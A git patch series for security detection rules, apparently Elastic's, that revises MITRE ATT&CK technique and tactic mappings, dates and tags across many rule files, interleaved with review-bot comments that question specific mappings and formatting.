@@ -37,22 +37,39 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "github.actor_ip"] diff --git a/rules_building_block/initial_access_github_new_user_agent_for_pat.toml b/rules_building_block/initial_access_github_new_user_agent_for_pat.toml index 8ec411ba6d9..a0eadada079 100644 --- a/rules_building_block/initial_access_github_new_user_agent_for_pat.toml +++ b/rules_building_block/initial_access_github_new_user_agent_for_pat.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -37,22 +37,39 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "github.user_agent"] diff --git a/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml b/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml index fc9e62e6053..f08ca02aa13 100644 --- a/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml +++ b/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/08/19" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -98,26 +98,46 @@ event.dataset: "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.001" +name = "Malicious Link" +reference = "https://attack.mitre.org/techniques/T1204/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/initial_access_microsoft_quarantine_hygiene_signal.toml b/rules_building_block/initial_access_microsoft_quarantine_hygiene_signal.toml index db599d22bf6..59d2b383cf2 100644 --- a/rules_building_block/initial_access_microsoft_quarantine_hygiene_signal.toml +++ b/rules_building_block/initial_access_microsoft_quarantine_hygiene_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -52,11 +52,21 @@ event.dataset:o365.audit and event.code:(Quarantine or HygieneEvent or MailSubmi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" [rule.threat.tactic] id = "TA0001" diff --git a/rules_building_block/initial_access_new_okta_authentication_behavior.toml b/rules_building_block/initial_access_new_okta_authentication_behavior.toml index 3333bc42b4d..30cd77e12b3 100644 --- a/rules_building_block/initial_access_new_okta_authentication_behavior.toml +++ b/rules_building_block/initial_access_new_okta_authentication_behavior.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/11/07" integration = ["okta"] maturity = "production" -updated_date = "2026/01/08" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -76,8 +76,17 @@ event.dataset:okta.system and okta.debug_context.debug_data.risk_behaviors:* [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules_building_block/initial_access_okta_admin_console_login_failure.toml b/rules_building_block/initial_access_okta_admin_console_login_failure.toml index 38c577a2179..212cbbd12bf 100644 --- a/rules_building_block/initial_access_okta_admin_console_login_failure.toml 
+++ b/rules_building_block/initial_access_okta_admin_console_login_failure.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/03" integration = ["okta"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,26 +81,31 @@ event.dataset: "okta.system" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules_building_block/lateral_movement_posh_winrm_activity.toml b/rules_building_block/lateral_movement_posh_winrm_activity.toml index 444d49ece7f..7021ddb7aa3 100644 --- a/rules_building_block/lateral_movement_posh_winrm_activity.toml +++ b/rules_building_block/lateral_movement_posh_winrm_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/12" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -83,36 +83,41 @@ case_insensitive = true value = "?:\\\\ExchangeServer\\\\bin*" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.006" name = "Windows Remote Management" reference = "https://attack.mitre.org/techniques/T1021/006/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml b/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml index dbc9fce692a..880890a7609 100644 --- a/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml +++ b/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/25" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
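Review bot: T1047 Windows Management Instrumentation is added to the Execution entry of a PowerShell-over-WinRM rule, but nothing visible in the hunk ties the detection to WMI: the context shows the WinRM sub-technique (T1021.006) and the PowerShell sub-technique (T1059.001), and the query itself is outside the hunk. WinRM and WMI are distinct remoting channels that ATT&CK deliberately separates, so unless the query also matches WMI-driven activity this mapping overstates coverage. Confirm against the query or drop the technique. The rule's threat tables are fully within this hunk, but the query they describe is not.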
@@ -78,31 +78,57 @@ process where event.type == "start" and host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1505" name = "Server Software Component" reference = "https://attack.mitre.org/techniques/T1505/" + [[rule.threat.technique.subtechnique]] id = "T1505.001" name = "SQL Stored Procedures" reference = "https://attack.mitre.org/techniques/T1505/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules_building_block/lateral_movement_wmic_remote.toml b/rules_building_block/lateral_movement_wmic_remote.toml index 75ac81fc7f1..aa4f14d918c 100644 --- a/rules_building_block/lateral_movement_wmic_remote.toml +++ b/rules_building_block/lateral_movement_wmic_remote.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/24" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -51,31 +51,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + [[rule.threat.technique.subtechnique]] id = "T1021.006" name = "Windows Remote Management" reference = "https://attack.mitre.org/techniques/T1021/006/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml b/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml index f4aaaef461d..aa24f20264c 100644 --- a/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml +++ b/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -43,29 +43,33 @@ event.dataset: aws.cloudtrail and event.provider: "iam.amazonaws.com" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/persistence_github_new_pat_for_user.toml b/rules_building_block/persistence_github_new_pat_for_user.toml index a65b0128137..88157c22dc0 100644 --- a/rules_building_block/persistence_github_new_pat_for_user.toml +++ b/rules_building_block/persistence_github_new_pat_for_user.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -37,22 +37,39 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal
[[rule.threat]]
framework = "MITRE ATT&CK"
+
[[rule.threat.technique]]
id = "T1098"
name = "Account Manipulation"
reference = "https://attack.mitre.org/techniques/T1098/"
+
[[rule.threat.technique.subtechnique]]
id = "T1098.001"
name = "Additional Cloud Credentials"
reference = "https://attack.mitre.org/techniques/T1098/001/"
-
-
[rule.threat.tactic]
id = "TA0003"
name = "Persistence"
reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
[rule.new_terms]
field = "new_terms_fields"
value = ["user.name", "github.hashed_token"]
diff --git a/rules_building_block/persistence_github_new_user_added_to_organization.toml b/rules_building_block/persistence_github_new_user_added_to_organization.toml
index ebf6de67223..fbad7c11ca5 100644
--- a/rules_building_block/persistence_github_new_user_added_to_organization.toml
+++ b/rules_building_block/persistence_github_new_user_added_to_organization.toml
@@ -3,7 +3,7 @@ bypass_bbr_timing = true
creation_date = "2023/10/11"
integration = ["github"]
maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
[rule]
author = ["Elastic"]
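Review bot: The new `[[rule.threat]]` entry mapping T1078.004 to Defense Evasion (TA0005) is not accompanied by any visible change to the rule's `tags` array, which lies outside this hunk; if the repository's tag/tactic consistency check applies to building-block rules, a `"Tactic: Defense Evasion",` entry is now required, so confirm it was added. The same applies to the identical T1078.004 / TA0005 entry added to privilege_escalation_sts_getsessiontoken_abuse.toml later in this patch. Both rules' tag lists are not shown in the diff, so this is a check rather than a confirmed omission.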
@@ -35,19 +35,23 @@ configuration where event.dataset == "github.audit" and event.action == "org.add
[[rule.threat]]
framework = "MITRE ATT&CK"
+
[[rule.threat.technique]]
id = "T1098"
name = "Account Manipulation"
reference = "https://attack.mitre.org/techniques/T1098/"
+
[[rule.threat.technique.subtechnique]]
id = "T1098.001"
name = "Additional Cloud Credentials"
reference = "https://attack.mitre.org/techniques/T1098/001/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
[rule.threat.tactic]
id = "TA0003"
name = "Persistence"
reference = "https://attack.mitre.org/tactics/TA0003/"
-
diff --git a/rules_building_block/persistence_iam_instance_request_to_iam_service.toml b/rules_building_block/persistence_iam_instance_request_to_iam_service.toml
index e4a2ed6fd5e..06b0a02191a 100644
--- a/rules_building_block/persistence_iam_instance_request_to_iam_service.toml
+++ b/rules_building_block/persistence_iam_instance_request_to_iam_service.toml
@@ -3,7 +3,7 @@ bypass_bbr_timing = true
creation_date = "2024/07/24"
integration = ["aws"]
maturity = "production"
-updated_date = "2024/11/07"
+updated_date = "2026/03/24"
[rule]
author = ["Elastic"]
@@ -84,20 +84,22 @@ field_names = [
[[rule.threat]]
framework = "MITRE ATT&CK"
+
[[rule.threat.technique]]
id = "T1078"
name = "Valid Accounts"
reference = "https://attack.mitre.org/techniques/T1078/"
+
[[rule.threat.technique.subtechnique]]
id = "T1078.004"
name = "Cloud Accounts"
reference = "https://attack.mitre.org/techniques/T1078/004/"
-
[[rule.threat.technique]]
id = "T1098"
name = "Account Manipulation"
reference = "https://attack.mitre.org/techniques/T1098/"
+
[[rule.threat.technique.subtechnique]]
id = "T1098.001"
name = "Additional Cloud Credentials"
@@ -108,17 +110,7 @@ id = "T1098.003"
name = "Additional Cloud Roles"
reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-
[rule.threat.tactic]
id = "TA0003"
name = "Persistence"
reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules_building_block/persistence_web_server_potential_sql_injection.toml b/rules_building_block/persistence_web_server_potential_sql_injection.toml
index a6611cbeb3b..43f2275ad19 100644
--- a/rules_building_block/persistence_web_server_potential_sql_injection.toml
+++ b/rules_building_block/persistence_web_server_potential_sql_injection.toml
@@ -3,7 +3,7 @@ bypass_bbr_timing = true
creation_date = "2025/11/19"
integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"]
maturity = "production"
-updated_date = "2026/03/16"
+updated_date = "2026/03/24"
[rule]
author = ["Elastic"]
@@ -124,3 +124,16 @@ reference = "https://attack.mitre.org/techniques/T1595/003/"
id = "TA0043"
name = "Reconnaissance"
reference = "https://attack.mitre.org/tactics/TA0043/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1190"
+name = "Exploit Public-Facing Application"
+reference = "https://attack.mitre.org/techniques/T1190/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules_building_block/persistence_web_server_sus_file_creation.toml b/rules_building_block/persistence_web_server_sus_file_creation.toml
index 3141a9913dc..e004c973f9d 100644
--- a/rules_building_block/persistence_web_server_sus_file_creation.toml
+++ b/rules_building_block/persistence_web_server_sus_file_creation.toml
@@ -3,7 +3,7 @@ bypass_bbr_timing = true
creation_date = "2025/03/06"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2025/12/24"
+updated_date = "2026/03/24"
[rule]
author = ["Elastic"]
@@ -160,3 +160,16 @@ reference = "https://attack.mitre.org/techniques/T1071/"
id = "TA0011"
name = "Command and Control"
reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1190"
+name = "Exploit Public-Facing Application"
+reference = "https://attack.mitre.org/techniques/T1190/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml b/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml
index 39bc5a78dcd..9a83403a8e3 100644
--- a/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml
+++ b/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml
@@ -3,7 +3,7 @@ bypass_bbr_timing = true
creation_date = "2021/05/17"
integration = ["aws"]
maturity = "production"
-updated_date = "2025/11/03"
+updated_date = "2026/03/24"
[rule]
author = ["Austin Songer", "Elastic"]
@@ -92,34 +92,52 @@ event.dataset: aws.cloudtrail
[[rule.threat]]
framework = "MITRE ATT&CK"
+
[[rule.threat.technique]]
id = "T1548"
name = "Abuse Elevation Control Mechanism"
reference = "https://attack.mitre.org/techniques/T1548/"
-
[rule.threat.tactic]
id = "TA0004"
name = "Privilege Escalation"
reference = "https://attack.mitre.org/tactics/TA0004/"
+
[[rule.threat]]
framework = "MITRE ATT&CK"
+
[[rule.threat.technique]]
id = "T1550"
name = "Use Alternate Authentication Material"
reference = "https://attack.mitre.org/techniques/T1550/"
+
[[rule.threat.technique.subtechnique]]
id = "T1550.001"
name = "Application Access Token"
reference = "https://attack.mitre.org/techniques/T1550/001/"
-
-
[rule.threat.tactic]
id = "TA0008"
name = "Lateral Movement"
reference = "https://attack.mitre.org/tactics/TA0008/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
[rule.investigation_fields]
field_names = [
"@timestamp",
From 1440d3442c481dbac14086376a7b09215bdff407 Mon Sep 17 00:00:00 2001
From: Isai <59296946+imays11@users.noreply.github.com>
Date: Wed, 25 Mar 2026 11:39:35 -0400
Subject: [PATCH 12/16] fix typo in description
---
.../exfiltration_sns_rare_protocol_subscription_by_user.toml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml b/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml
index e0dc490b37c..e0a94c08fa9 100644
--- a/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml
+++ b/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml
@@ -7,7 +7,7 @@ updated_date = "2026/03/24"
[rule]
author = ["Elastic"]
description = """
-Identifies when a use subscribes to an SNS topic using a new protocol type (ie. email, http, lambda, etc.). SNS allows users to subscribe to recieve topic messages across a broad range of protocols like email, sms, lambda functions, http endpoints, and applications. Adversaries may subscribe to an SNS topic to collect sensitive information or exfiltrate data via an external email address, cross-account AWS service or other means. This rule identifies a new protocol subscription method for a particular user.
+Identifies when a user subscribes to an SNS topic using a new protocol type (ie. email, http, lambda, etc.). SNS allows users to subscribe to recieve topic messages across a broad range of protocols like email, sms, lambda functions, http endpoints, and applications. Adversaries may subscribe to an SNS topic to collect sensitive information or exfiltrate data via an external email address, cross-account AWS service or other means. This rule identifies a new protocol subscription method for a particular user.
"""
false_positives = [
"""
From 551d36be691ba94da586fb27389d9565b876e3d5 Mon Sep 17 00:00:00 2001
From: Isai <59296946+imays11@users.noreply.github.com>
Date: Wed, 25 Mar 2026 11:41:31 -0400
Subject: [PATCH 13/16] adding back privilege escalation tactic
---
..._created_access_keys_for_another_user.toml | 19 +++++++++++++++++++
1 file changed, 19 insertions(+)
diff --git a/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml b/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml
index 8c1284af2e7..be58e3a20a7 100644
--- a/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml
+++ b/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml
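Review bot: The rewritten description line fixes `use` → `user` but leaves two other errors on the same line: `recieve` should be `receive`, and `ie.` should be `i.e.`. Since this commit is a description-only typo fix, folding both corrections into it avoids touching the rule again later.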
@@ -173,6 +173,25 @@ reference = "https://attack.mitre.org/techniques/T1098/001/"
id = "TA0003"
name = "Persistence"
reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique.subtechnique]]
+id = "T1098.001"
+name = "Additional Cloud Credentials"
+reference = "https://attack.mitre.org/techniques/T1098/001/"
+
+
+
[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+
+
[rule.investigation_fields]
field_names = [
"@timestamp",
From d5c1cab57f85d6635f568548ad37aa496e87bb08 Mon Sep 17 00:00:00 2001
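Review bot: The re-added `[[rule.threat]]` block is laid out inconsistently with the rest of the file and with the blank-line normalization applied to other rules earlier in this series: it follows the preceding tactic's `reference` line with no separating blank line, has no blank lines between its `framework`, technique and subtechnique tables, then carries several blank lines before `[rule.threat.tactic]` and two after it. Suggest one blank line before `[[rule.threat]]`, one between each table, and a single one before `[rule.investigation_fields]`. Restoring a Privilege Escalation tactic also presumably requires a matching `"Tactic: Privilege Escalation",` entry in the rule's `tags`, which is outside this hunk; verify it is present.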
From: terrancedejesus
Date: Wed, 25 Mar 2026 11:46:52 -0400
Subject: [PATCH 14/16] dejesus - tags reviewed azure, o365, kubernetes, gcp, google_workspace, okta
---
...ccess_storage_account_key_regenerated.toml | 19 +---------
...ge_blob_container_access_modification.toml | 13 -------
...act_resources_resource_group_deletion.toml | 33 ++++++++---------
...a_id_first_time_seen_device_code_auth.toml | 18 ++++++----
...sent_grant_via_registered_application.toml | 30 +++-------------
..._code_grant_unusual_app_resource_user.toml | 6 ++++
...via_first_party_microsoft_application.toml | 6 ++++
...ersistence_automation_account_created.toml | 13 -------
...id_user_signed_in_from_unusual_device.toml | 18 +--------
...sistence_event_hub_created_or_updated.toml | 18 ----------
...covery_denied_service_account_request.toml | 35 -------------------
.../execution_forbidden_creation_request.toml | 15 --------
...l_access_anonymous_request_authorized.toml | 12 -------
...calation_pod_created_with_hostnetwork.toml | 13 -------
...ege_escalation_privileged_pod_created.toml | 13 -------
...nge_followed_by_workload_modification.toml | 25 ++++---------
...e_workload_modification_by_user_agent.toml | 32 ++++++-----------
..._service_account_rbac_write_operation.toml | 24 ++++---------
...ignment_of_controller_service_account.toml | 12 -------
...ilbox_access_by_unusual_client_app_id.toml | 17 ---------
...a_id_device_reg_via_oauth_redirection.toml | 19 +--------
...access_identity_user_account_lockouts.toml | 17 +++++++++
...ange_mailbox_audit_bypass_association.toml | 5 ---
...tra_id_portal_login_impossible_travel.toml | 17 ---------
...l_access_attempted_bypass_of_okta_mfa.toml | 17 ---------
...multiple_user_agent_os_authentication.toml | 17 ---------
...ccess_okta_aitm_session_cookie_replay.toml | 19 +---------
...ttempt_to_deactivate_okta_application.toml | 18 ----------
...ta_attempt_to_delete_okta_application.toml | 18 ----------
...ta_attempt_to_modify_okta_application.toml |
13 -------
...rrence_user_session_started_via_proxy.toml | 17 ---------
...ta_user_attempted_unauthorized_access.toml | 9 +----
...ss_sign_in_events_via_third_party_idp.toml | 6 +---
...cation_sso_from_unknown_client_device.toml | 17 ---------
...ent_multiple_sessions_for_single_user.toml | 17 ---------
35 files changed, 89 insertions(+), 509 deletions(-)
diff --git a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml
index 2992628f85d..e87f967702a 100644
--- a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml
+++ b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml
@@ -73,6 +73,7 @@ tags = [
"Use Case: Identity and Access Audit",
"Tactic: Credential Access",
"Resources: Investigation Guide",
+
]
timestamp_override = "event.ingested"
type = "query"
@@ -117,21 +118,3 @@ reference = "https://attack.mitre.org/techniques/T1098/001/"
id = "TA0003"
name = "Persistence"
reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1098.001"
-name = "Additional Cloud Credentials"
-reference = "https://attack.mitre.org/techniques/T1098/001/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml
index f39b0218f9a..574b980395c 100644
--- a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml
